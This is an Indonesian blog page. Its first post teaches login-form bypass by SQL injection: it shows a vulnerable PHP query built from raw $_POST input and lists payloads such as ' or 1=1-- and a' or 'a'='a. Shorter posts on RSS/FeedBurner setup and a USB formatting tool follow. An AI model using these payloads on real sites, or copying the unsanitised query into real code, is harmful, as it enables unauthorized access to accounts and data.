Di artikel kali ini saya mencoba menjelaskan cara melewati form login, sesuai namanya trik bypass berarti kita seolah menuju suatu tempat naek pesawat bukan dengan mobil yang lewat daratan dimana banyak rintangan terutama polantas !
berikut contoh sebuah command login.
Code:
$query = "select * from user where username='".$_POST['user']."' AND password='".md5($_POST['pass'])."'";
pada login yang valid (dari admin beneran), query akan menjadi seperti ini:
Code:
$query = "select * from user where username='admin' AND password='dlfjoew8r509ewrjeowru94efjlsj'";
query tersebut benar, dan benar2 melakukan pengecekan apakah user admin dengan password dlfjoew8r509ewrjeowru94efjlsj ada di database. jika tidak ada, return false dan tidak bisa login. jika ada, return true dan login.
Code:
username='admin' AND password='dlfjoew8r509ewrjeowru94efjlsj'
kedua hal tersebut adalah statement yg di cek oleh query mysql.
namun ternyata pengecekan tersebut bisa di lewati dengan membuat query memberikan return true. kita hanya perlu membuat query selalu memberikan nilai benar. salah satu yg bisa kita lakukan adalah dengan menambahkan statement OR dengan statement yg memberikan return true. misal 1=1
Code:
OR 1=1
sehingga, kita perlu membuat query menjadi seperti ini :
Code:
$query = "select * from user where username='admin' OR 1=1 AND password='dlfjoew8r509ewrjeowru94efjlsj' OR 1=1";
sehingga, user yg perlu kita masukan adalah : admin' OR 1=1
beberapa admin yg cukup pintar, sudah membuat script query nya lengkap dengan tnda petik untuk menghindari error.
Code:
$query = "select * from user where username='".$_POST['user']."' AND password='".md5($_POST['pass'])."'";
sehingga, dengan user : admin' OR 1=1 query akan menjadi seperti ini:
Code:
$query = "select * from user where username='admin' OR 1=1' AND password='".md5($_POST['pass'])."'";
apa yg terjadi? query error karena kelebihan 1 tanda petik (lihat di belakang angka 1). dan tentu saja return yg di berikan tidak akan true. otomatis login gagal. untuk itu, kita perlu men-terminate script query tersebut. yaitu dengan memberikan comment mysql: --
Sehingga, user yg bisa kita masukkan adalah: admin' or 1=1--
Code:
$query = "select * from user where username='admin' or 1=1--' AND password='".md5($_POST['pass'])."'";
dengan demikian, pengecekan di belakang coment akan di lewati. dan return dari query akan selalu true. perhatikan hukum logika berikut pada argument AND:
Code:
true AND true = true
true AND false = false
false AND false = false
false AND true = false
"AND" membandingkan true dengan true. jika kedua terbanding bernilai true, maka return true. jika salah satu atau kedua nya false, maka return false.
namun, berbeda dengan OR.
Code:
true OR true = true
true OR false = true
false OR true = true
false OR false = false
jika salah satu TRUE, maka return akan memberikan TRUE.
Nah, perhatikan query setellah di inject:
Code:
$query = "select * from user where username='admin' or 1=1--' AND password='".md5($_POST['pass'])."'";
1=1 ----> true
admin OR true = true
walapun user admin tidak pernah ada, maka query akan selalu memberikan nilai true, karena 1=1 adalah benar (true).
kita bisa tanpa memberikan username sama sekali. sehingga injeksi akan menjadi seperti ini jika kita menggunakan username dan password yg sama : ' or 1=1--
Code:
$query = "select * from user where username='' or 1=1--' AND password='' or 1=1--'";
hal yg perlu kita perhatikan untuk bypass login adalah nilai true yg di keluarkan dan tidak terjadinya error pada script. sehingga penggunaan tanda baca sangat fatal pada injeksi seperti ini.
dengan memperhatikan output nilai true dan script berjalan dengan benar (tanpa error), kita bisa mencoba berbagai variasi username dan password untuk bisa login. misal
Code:
a' or 'a'='a
dengan demikian, kita telah memanipulasi query menjadi seperti ini:
Code:
$query = "select * from user where username='a' or 'a'='a' AND password='a' or 'a'='a'";
tidak ada tanda kutip yang tidak tertutup, sehingga query berjalan lancar. statement OR memberikan nilai true, karena 'a'='a' adalah benar. mysql query memang sangat peka terhadap tanda petik. jangan ada tanda petik yg tidak tertutup.
berbagai variasi injeksi login seperti berikut:
Code:
' or 1=1
' or '1'='1'
1' or 1=1
1' or '1'='1'
' or 'z'='z
dll, sesuai kreasi kita.
beberapa admin ada yg biasa menggunakan petik ganda dalam codingnya.
Code:
$query = 'select * from user where username="admin" or 1=1-- AND password="'.md5($_POST["pass"]).'"';
hal tersebut sah sah aja, karena penggunaan tanda baca masih tepat. dengan demikian, injeksi akan sedikit berubah.
Code:
" or 1=1
" or "1"="1
a" or "a"="a
" or "a"="a
Pengethuan tentang query mysql sangat penting dalam hal ini. sehingga kita bisa memanipulasi, memainkan injeksi untuk membypass login admin. karena, administrator biasanya berbeda orang berbeda pula cara coding. sehingga berbagai variasi injeksi akan sangat mungkin terjadi.
Rabu, 13 Juli 2016
Jumat, 13 Mei 2016
Pengertian RSS
RSS adalah singkatan dari Really Simple Sindication, yakni satu sistem sindikasi yang memungkinkan Anda untuk mendapatkan update/artikel terbaru dari situs-situs favorit Anda secara otomatis. Misalkan Anda sangat menyukai blog ini (cuma contoh lho!), maka dengan mendaftarkan diri di RSS saya, Anda akan memperoleh artikel-artikel terbaru setiap kali saya meng-update blog ini.
RSS adalah sebuah file berformat XML untuk sindikasi yang telah digunakan (diantaranya dan kebanyakan) situs web berita dan weblog. Singkatan ini biasanya mengarah ke :
RSS adalah sebuah file berformat XML untuk sindikasi yang telah digunakan (diantaranya dan kebanyakan) situs web berita dan weblog. Singkatan ini biasanya mengarah ke :
§ Rich Site Summary (RSS 0.91)
§ RDF Site Summary (RSS 0.9 and 1.0)
Teknologi yang dibangun dengan RSS mengijinkan kita untuk berlangganan kepada situs web yang menyediakan umpan web (feed) RSS, sebagai contoh mungkin anda mau berlangganan pada situs saya >< nah dengan mendaftarkan diri kalian pada blog saya, kalian dapat memperoleh pemberitahuan tentang artikel terbaru yang berada pada blog saya. Tapi berbeda dengan langganan koran atau majalah. Untuk berlangganan RSS tidak dikenakan biaya, alias gratis. Tapi, kita biasanya hanya mendapatkan satu baris atau sebuah pengantar dari isi situs berikut alamat terkait untuk membaca isi lengkap artikelnya.
RSS digunakan pada hampir semua situs berita atau weblog, dengan berbagai tujuan termasuk: pemasaran, press release, laporan reguler produk, atau aktivitas lain yang membutuhkan pemberitahuan periodik dan tentunya publikasi.
Bagaimana cara kita menggunakan RSS ??
Caranya cukup mudah, berikut cara membuat RSS
1. Kunjungi situsnya yaitu www.feedburner.com
2. Klik log in. Anda dapat menggunakan akun google anda (gmail)
3. Dihalaman My Feeds lakukan sebagai berikut :
a. Masukkan alamat web/blog anda pada kotak Burn a feed right this instant.
b. Biarkan I am poadcaster tidak tercentang
c. Lalu klik next
4. Ubah feed title dan feed addres sesuai kehendak anda
5. Tampil halaman congrats! Yang berarti feedburner anda sudah jadi
6. Lalu klik tulisan skip directly to feed management
7. Klik tab publicize, lalu pilih email subscription
8. Lalu klik activate
9. Lalu copy kode scriptnya dan pastekan di web/blog anda dengan menambahkan widget pada blog/web anda
a. Untuk blogger pergilah ke settingan tata letak lalu klik add gadget
b. Pilih HTML/Java Script
c. Lalu pastekan kode nya. Berikan judul sesuai keinginan anda dan save
d. selesai
Jumat, 25 Maret 2016
MENGATASI KAPASITAS FLASH DISK BERKURANG
Pernahkah Anda mengalami kapasitas di flash disk Anda berkurang ?
Akan tetapi Fenomena ini pastinya tidak anda inginkan karena kapasitas Flash disk Anda berkurang mungkin jika bertambah itu membuat Anda senang.
Saya memiliki Flash disk Kapasitas 8 GB pada saat itu saya mencoba bereksperiment alias membuat Boot USB sebuah OS, dan menyebabkan kapasitas flash disk saya hilang secara misterius dan hanya tersisa 254MB
Dengan Menggunakan USB FORMAT
Tools ini Kecil tetapi manjur.. jadi saya lakukan format Flash Disk menggunakan Tools Ini. Dan akhirnya Flash disk saya kembali normal Dengan kapasitas 8GB.
Nah jika anda memiliki masalah yang sama seperti saya bisa download Tools Ini DISINI
Caranya Tinggal ekstrak dimana saja kemudian klik dua kali usb_format.exe
Tancapkan USB yang bermasalah tadi kemudian pilih Formatnya FAT32 untuk Flash Disk.
Klik Format. Tunggu hingga selesai dan lihat hasilnya...!!!
Klik Format. Tunggu hingga selesai dan lihat hasilnya...!!!
Langganan:
Postingan (Atom)




